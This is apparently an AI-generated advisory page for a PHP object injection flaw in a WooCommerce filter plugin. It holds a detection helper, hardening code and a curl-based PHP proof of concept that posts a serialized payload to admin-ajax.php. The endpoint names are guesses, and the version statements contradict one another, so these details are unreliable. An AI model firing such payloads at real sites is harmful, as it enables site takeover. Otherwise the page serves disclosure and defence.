Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 26, 2026

CVE-2026-40725: WooCommerce Product Filters < 2.0.6 – Unauthenticated PHP Object Injection (woocommerce-product-filters)

Severity: High (CVSS 8.1)
CWE: 502
Vulnerable Version: 2.0.6
Patched Version:
Disclosed: April 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-40725 (metadata-based):

The WooCommerce Product Filters plugin for WordPress, versions up to and including 2.0.6, contains an unauthenticated PHP Object Injection vulnerability. This affects the ‘woocommerce-product-filters’ plugin. The vulnerability carries a CVSS score of 8.1 (HIGH), with a vector string of AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H. The CWE classification is 502, indicating Deserialization of Untrusted Data.

Root Cause: The vulnerability stems from the plugin deserializing user-supplied input without proper sanitization or validation. Inferred from the CWE classification and description, the plugin likely calls unserialize() on data received from HTTP requests (possibly via a shortcode attribute, AJAX parameter, or REST API endpoint). Without access to the source code, Atomic Edge research cannot confirm the exact input vector, but the most common WordPress pattern for this vulnerability class is processing serialized data from query string parameters or POST bodies. The vulnerability requires no authentication, as the description states that unauthenticated attackers can exploit it.

Exploitation: An attacker can craft a malicious serialized PHP object and send it to an exposed endpoint. Based on the plugin slug and common WordPress patterns, the likely attack vector is an AJAX handler registered via wp_ajax_ or wp_ajax_nopriv_ hooks. The endpoint is probably /wp-admin/admin-ajax.php with an action parameter like ‘woocommerce_product_filters_load’ or similar. The attacker sends a POST request containing a serialized payload in a parameter (e.g., ‘filter_data’ or ‘query_data’). The plugin then deserializes this input without validation, creating a PHP object of the attacker’s choosing. Since no POP chain exists in the plugin itself, the attack requires another plugin or theme on the target system that provides useful gadget chains for achieving remote code execution, file deletion, or data exfiltration.
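From the detection side, the following is an added example (not code from this page, from Atomic Edge, or from the plugin): a PHP helper that flags request parameters carrying PHP-serialised object tokens, which is the shape any payload against a CWE-502 bug of this kind must take. It can back a WAF rule or be run over recorded admin-ajax.php POST bodies. The sample requests are constructed, and the 'wcpf_' prefix and 'query_data' parameter are the same assumptions the PoC on this page makes, not confirmed plugin identifiers.

```php
<?php
// Added example (not from the original page or the plugin): detecting
// PHP-serialised object payloads in request parameters. The 'wcpf_' prefix
// and the 'query_data' parameter name are assumptions, not plugin names.

/**
 * Return the class names a PHP-serialised string would instantiate when
 * passed to unserialize(), or an empty array when no object token is present.
 * url-encoded and base64-wrapped variants are checked too, since both are
 * common ways of carrying such a payload in a form field.
 */
function wcpf_serialized_classes( $value ) {
    $candidates = array( $value, urldecode( $value ) );
    $decoded    = base64_decode( $value, true );
    if ( false !== $decoded ) {
        $candidates[] = $decoded;
    }

    $classes = array();
    foreach ( $candidates as $candidate ) {
        // O:<len>:"<class>" is the object token; C:<len>:"<class>" is the
        // Serializable-interface form. Either may start the string or follow
        // a '{' or ';' when nested inside a serialised array.
        if ( preg_match_all( '/(?:^|[{;])[OC]:\d+:"([^"]+)"/', $candidate, $m ) ) {
            foreach ( $m[1] as $name ) {
                $classes[ $name ] = true;
            }
        }
    }
    return array_keys( $classes );
}

/**
 * Scan one url-encoded POST body and return the offending parameters
 * mapped to the class names they would instantiate.
 */
function wcpf_scan_post_body( $body ) {
    parse_str( $body, $params );
    $hits = array();
    foreach ( $params as $name => $value ) {
        if ( ! is_string( $value ) ) {
            continue; // nested array parameters are out of scope here
        }
        $found = wcpf_serialized_classes( $value );
        if ( $found ) {
            $hits[ $name ] = $found;
        }
    }
    return $hits;
}

// Constructed sample request bodies: a benign serialised array (still worth
// migrating to JSON, but no object), a bare object injection attempt, and a
// base64-wrapped attempt using the same placeholder class as the PoC above.
$samples = array(
    '203.0.113.5'  => 'action=wcpf_load_products&query_data=' . urlencode( 'a:1:{s:8:"category";s:5:"shoes";}' ),
    '203.0.113.9'  => 'action=wcpf_load_products&query_data=' . urlencode( 'O:8:"stdClass":0:{}' ),
    '198.51.100.7' => 'action=wcpf_load_products&query_data=' . urlencode( base64_encode( 'a:1:{i:0;O:9:"SomeClass":1:{s:4:"prop";s:4:"test";}}' ) ),
);

foreach ( $samples as $ip => $body ) {
    $hits = wcpf_scan_post_body( $body );
    if ( $hits ) {
        foreach ( $hits as $param => $classes ) {
            printf( "[ALERT] %s param=%s classes=%s\n", $ip, $param, implode( ',', $classes ) );
        }
    } else {
        printf( "[ok]    %s\n", $ip );
    }
}
```

Expect the first sample to pass and the other two to be flagged with stdClass and SomeClass respectively. The regex is deliberately loose: a legitimate string value that happens to contain `;O:1:"x"` would also trigger, which is acceptable for an alert that an analyst reviews, and a plugin whose handlers only accept JSON should never see a serialised array in this parameter at all.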

Remediation: Atomic Edge analysis concludes the fix must replace all unserialize() calls with json_decode() or implement strict input validation. The plugin should never deserialize untrusted data. If serialized data is required for internal use, the plugin must use a safe serialization format like JSON and validate that the data matches expected schemas. The patched release, presumably 2.0.7 given that 2.0.6 is the last vulnerable version, should implement these changes.
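The remediation described above, written out as an added example (this is not the plugin's code and was not published by Atomic Edge): the unsafe handler pattern beside a hardened version that parses JSON, validates against an allow-list of keys, and, for a transition period where PHP-serialised input cannot be dropped in one release, refuses object instantiation through unserialize()'s allowed_classes option. The hook name 'wcpf_load_products', the 'query_data' parameter and the field names in the allow-list are assumptions carried over from the PoC on this page.

```php
<?php
// Added example (not the plugin's code): the unsafe pattern the analysis
// describes beside a hardened replacement. Hook and parameter names are
// assumptions, not confirmed identifiers from woocommerce-product-filters.

// --- Unsafe: deserialises request data, so any class on the site with a
// magic method (__wakeup, __destruct, __toString) becomes a usable gadget.
function wcpf_load_products_unsafe() {
    $raw   = isset( $_POST['query_data'] ) ? wp_unslash( $_POST['query_data'] ) : '';
    $query = unserialize( $raw ); // CWE-502: attacker controls the object graph
    wp_send_json_success( $query );
}

// --- Hardened: JSON instead of PHP serialisation, arrays only, a strict
// allow-list, and a nonce for the cross-site request angle. The nonce is not
// the fix (an unauthenticated caller can fetch one from the page); the parser
// change is.
function wcpf_load_products_safe() {
    check_ajax_referer( 'wcpf_filter', 'nonce' );

    $raw  = isset( $_POST['query_data'] ) ? wp_unslash( $_POST['query_data'] ) : '';
    $data = json_decode( $raw, true ); // assoc = true: never produces objects
    if ( ! is_array( $data ) || JSON_ERROR_NONE !== json_last_error() ) {
        wp_send_json_error( 'invalid query', 400 );
    }

    $query = wcpf_validate_query( $data );
    if ( null === $query ) {
        wp_send_json_error( 'invalid query', 400 );
    }
    wp_send_json_success( $query );
}

/**
 * Allow-list validation: only the keys we expect (assumed field names), each
 * coerced to the type we expect. Unknown keys fail closed instead of being
 * passed through to whatever builds the product query.
 */
function wcpf_validate_query( array $data ) {
    $allowed = array( 'category', 'min_price', 'max_price', 'per_page' );
    if ( array_diff( array_keys( $data ), $allowed ) ) {
        return null;
    }

    $query = array();
    if ( isset( $data['category'] ) ) {
        $query['category'] = sanitize_title( (string) $data['category'] );
    }
    foreach ( array( 'min_price', 'max_price' ) as $key ) {
        if ( isset( $data[ $key ] ) ) {
            if ( ! is_numeric( $data[ $key ] ) ) {
                return null;
            }
            $query[ $key ] = max( 0.0, (float) $data[ $key ] );
        }
    }
    if ( isset( $data['per_page'] ) ) {
        $query['per_page'] = min( 100, max( 1, absint( $data['per_page'] ) ) );
    }
    return $query;
}

// Stop-gap for legacy callers that still send PHP-serialised strings:
// allowed_classes => false turns every O:... entry into
// __PHP_Incomplete_Class, which has no magic methods, so no gadget chain runs.
// Scalars and arrays still come through; objects never do.
function wcpf_unserialize_no_objects( $raw ) {
    return @unserialize( $raw, array( 'allowed_classes' => false ) );
}

add_action( 'wp_ajax_wcpf_load_products',        'wcpf_load_products_safe' );
add_action( 'wp_ajax_nopriv_wcpf_load_products', 'wcpf_load_products_safe' );
```

Registering the same callback on both the `wp_ajax_` and `wp_ajax_nopriv_` hooks keeps the logged-out path, which is the one the advisory is about, under the same validation as the logged-in one. The `allowed_classes` option requires PHP 7.0 or later; the JSON path has no such dependency and is the form the analysis recommends.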

Impact: Successful exploitation can lead to complete compromise of the WordPress site. An attacker with a suitable POP chain can achieve remote code execution, delete arbitrary files, or retrieve sensitive data such as database credentials. Despite the high complexity (AC:H in CVSS), the unauthenticated nature and severe impact make this a critical risk for any site running vulnerable versions with additional plugins that contain exploitable gadget chains.

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-40725 - WooCommerce Product Filters < 2.0.6 - Unauthenticated PHP Object Injection

/**
 * This PoC demonstrates an unauthenticated PHP Object Injection attack
 * against the WooCommerce Product Filters plugin (versions <= 2.0.6).
 * 
 * Assumptions:
 * - The vulnerable endpoint is admin-ajax.php with action 'wcpf_load_products'
 *   (based on plugin slug 'woocommerce-product-filters' and common naming patterns)
 * - The parameter 'query_data' contains the serialized payload
 * - No nonce or capability checks are performed on the AJAX handler
 *
 * This payload exploits a generic PHP object injection. Replace 'SomeClass' with
 * an actual class name from a POP chain present on the target system.
 */

$target_url = 'http://example.com'; // Change this to the target WordPress URL

// The serialized object payload - this example creates a stdClass object
// In a real attack, this would contain a gadget chain to execute arbitrary code
$payload = serialize(new stdClass());

// Alternative payload with a specific class (requires POP chain)
// $payload = 'O:9:"SomeClass":1:{s:4:"prop";s:4:"test";}';

// Initialize cURL
$ch = curl_init();

// Prepare POST data for the AJAX request
$post_data = array(
    'action'     => 'wcpf_load_products',
    'query_data' => $payload
);

// Configure cURL request
curl_setopt_array($ch, array(
    CURLOPT_URL            => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => http_build_query($post_data),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER         => false,
    CURLOPT_SSL_VERIFYPEER => false, // Disable for testing with self-signed certs
    CURLOPT_TIMEOUT        => 30,
    CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
));

// Execute the request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo '[!] cURL Error: ' . curl_error($ch) . PHP_EOL;
} else {
    echo '[+] Request sent successfully.' . PHP_EOL;
    echo '[!] Response: ' . $response . PHP_EOL;
    echo '[!] If the server returns a JSON error or empty response, the injection may have succeeded or the endpoint is incorrect.' . PHP_EOL;
}

// Close cURL handle
curl_close($ch);

/**
 * Notes:
 * - Adjust the 'action' parameter if the actual endpoint differs (check plugin source or network traffic)
 * - If no POP chain exists, the object is created but has no effect (PHP garbage collected)
 * - For testing, use XDebug or log injection to confirm the unserialize() call
 */
